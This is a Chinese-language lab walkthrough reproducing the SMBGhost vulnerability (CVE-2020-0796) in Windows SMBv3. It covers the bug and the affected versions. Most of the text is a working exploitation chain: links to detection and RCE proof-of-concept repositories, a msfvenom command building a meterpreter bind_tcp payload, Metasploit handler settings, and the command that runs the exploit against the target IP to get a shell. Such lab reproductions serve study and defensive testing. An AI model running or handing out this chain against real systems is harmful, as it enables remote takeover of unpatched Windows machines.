《永恆之黑》CVE-2020-0796漏洞復現
《永恆之黑》CVE-2020-0796漏洞復現
-
|漏洞簡介
2020年3月12日,微軟正式釋出CVE-2020-0796高危漏洞補丁,本漏洞源於SMBv3沒有正確處理壓縮的資料包,在解壓資料包的時候使用客戶端傳過來的長度進行解壓時,並沒有檢查長度是否合法,最終導致整數溢位。利用該漏洞,攻擊方可直接遠端攻擊SMB服務端遠端執行任意惡意程式碼,CVE-2020-0796漏洞與“永恆之藍”系列漏洞極為相似,都是利用Windows SMB漏洞遠端攻擊獲取系統最高許可權。
-
|影響版本
Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)
-
|漏洞復現
1.環境搭建:
kali 攻擊機:192.168.87.128
win10靶機:192.168.87.143
2.檢視win10靶機版本,win+r,輸入winver
3.使用SMBGhost工具檢測win靶機是否存在漏洞,工具下載:https://github.com/ollypwn/SMBGhost
也可以使用藍屏payload,驗證漏洞。藍屏poc下載:https://github.com/chompie1337/SMBGhost_RCE_PoC
win10出現藍屏,說明存在漏洞
當然也有其他很多方法,如:
https://github.com/joaozietolie/CVE-2020-0796-Checker
4.利用msfvenom生成的exp反彈shell
msfvenom -p windows/x64/meterpreter/bind_tcp lport=4444 -b '\x00' -i 1 -f python>exploit
msf生成的exploit
替換SMBGhost_RCE_PoC中的exploit.py,並把buf改為USER_PAYLOAD
5.替換好了,設定msf監聽
msfconsole //執行msf
use exploit/multi/handler //開啟監聽模組
set payload windows/x64/meterpreter/bind_tcp //設定反彈模式
set rhost 192.168.87.143 //設定目標靶機ip
set lport 4444 //設定監聽埠
run //執行
6.SMBGhost_RCE_PoC執行payload,python3 exploit.py -ip 192.168.87.143,反彈shell